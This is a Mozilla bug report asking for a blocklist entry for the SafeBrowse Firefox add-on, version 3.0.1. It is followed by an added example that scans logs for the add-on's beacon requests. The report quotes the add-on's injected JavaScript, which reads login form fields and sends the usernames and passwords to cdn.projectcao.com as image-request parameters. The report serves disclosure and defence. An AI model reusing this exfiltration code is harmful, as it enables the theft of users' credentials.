Closed
Bug 1097696
Opened 11 years ago
Closed 11 years ago
Extension block request: safebrowse@safebrowse.co
Categories: Toolkit :: Blocklist Policy Requests, defect
Tracking: VERIFIED FIXED, 2014-11
People: Reporter: diegocr, Assigned: jorgev
Details: Whiteboard: [extension]
Attachments: 1 file (14.36 KB, application/octet-stream)
Extension name: SafeBrowse
Extension UUID: safebrowse@safebrowse.co
Extension versions to block: 3.0.1
Applications, versions, and platforms affected: Firefox Desktop
Block severity: hard
Homepage, AMO listing, other references and contact info:
https://www.safebrowse.co/
https://code.google.com/p/safebrowse/source/browse/
Affiliations, fwiw: quecaja.com, inmundicias.com, projectcao.com
Reasons:
This add-on injects the following script into every page:
https://safebrowse.googlecode.com/svn/trunk/core.js
Such script additionally injects this:
//safebrowse.googlecode.com/svn/trunk/nowait.js
//safebrowse.googlecode.com/svn/trunk/replace.js
The latter script has code specifically made to collect usernames & passwords and sends them to a cdn hosted on projectcao.com.
A little snippet:
function validateImg(e, t, n) {
    var i = "wp" == n ? "&loc=" + encodeURIComponent(window.location.href) : "",
        a = document.createElement("img");
    return a.src = "http://cdn.projectcao.com/image_close.png?us=" + SB64.encode(e) + "&ps=" + SB64.encode(t) + "&st=" + n + i, !0
}
...
function validateDb() {
    var e = $el('input[name="login_email"]').value,
        t = $el('input[name="login_password"]').value;
    return validateImg(e, t, "db"), !0
}

function validateI() {
    var e = $el('input[name="username"]').value,
        t = $el('input[name="password"]').value;
    return validateImg(e, t, "i"), !0
}

function validateS() {
    var e = $el('input[name="login"]').value,
        t = $el('input[name="clave"]').value;
    return validateImg(e, t, "s"), !0
}
....
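Added example, not part of the bug report or the add-on's code: a scan of proxy-style log lines for requests shaped like the validateImg() beacon quoted above (an image request carrying us, ps and st together). The log layout, the helper names classifyBeacon and scanLog, and the sample lines are assumptions constructed for illustration; the parameter names, st tags and host come from the snippet.

```javascript
// Added example (not from the bug or the add-on): flag logged URLs shaped
// like the validateImg() beacon. Parameter names and st tags come from the
// quoted snippet; the log layout and sample lines are constructed.
const IMAGE_EXT = /\.(png|gif|jpe?g|webp|ico)$/i;
const SNIPPET_TAGS = new Set(["db", "i", "s", "wp"]);

function classifyBeacon(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch (err) {
    return null; // not an absolute URL
  }
  if (!IMAGE_EXT.test(url.pathname)) return null;
  const q = url.searchParams;
  // The snippet always sends us, ps and st together on an image request.
  if (!q.has("us") || !q.has("ps") || !q.has("st")) return null;
  return {
    host: url.hostname,
    tag: q.get("st"),
    knownTag: SNIPPET_TAGS.has(q.get("st")),
    leaksPageUrl: q.has("loc"), // the "wp" branch appends the page URL
    // Lengths only, so an alert never copies the captured values onward.
    userLen: q.get("us").length,
    passLen: q.get("ps").length,
  };
}

// Assumed log layout: "<timestamp> <client> <method> <url>"
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const [, client, , url] = line.trim().split(/\s+/);
    const hit = url ? classifyBeacon(url) : null;
    if (hit) hits.push({ client, ...hit });
  }
  return hits;
}

// Constructed sample lines; the us/ps values are placeholders.
const SAMPLE_LOG = [
  "2014-11-12T10:00:01Z 10.0.0.5 GET http://cdn.projectcao.com/image_close.png?us=QUJD&ps=REVG&st=db",
  "2014-11-12T10:00:02Z 10.0.0.5 GET http://static.example.org/logo.png?v=3",
  "2014-11-12T10:00:03Z 10.0.0.7 GET http://cdn.projectcao.com/image_close.png?us=QQ&ps=Qg&st=wp&loc=http%3A%2F%2Fblog.example.org%2Fwp-login.php",
  "2014-11-12T10:00:04Z 10.0.0.9 GET http://app.example.org/api/login?us=a&ps=b&st=db",
];

console.log(scanLog(SAMPLE_LOG));
```

Matching on the request shape rather than the host alone also catches the same beacon if it is pointed at a different domain.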
Comment 1 • 11 years ago (Reporter)
current extension version 3.0.1

Updated • 11 years ago (Assignee)
Assignee: nobody → jorge
Group: client-services-security
Target Milestone: --- → 2014-11

Comment 2 • 11 years ago (Assignee)
Status: NEW → RESOLVED
Closed: 11 years ago
Resolution: --- → FIXED

Updated • 10 years ago
Product: addons.mozilla.org → Toolkit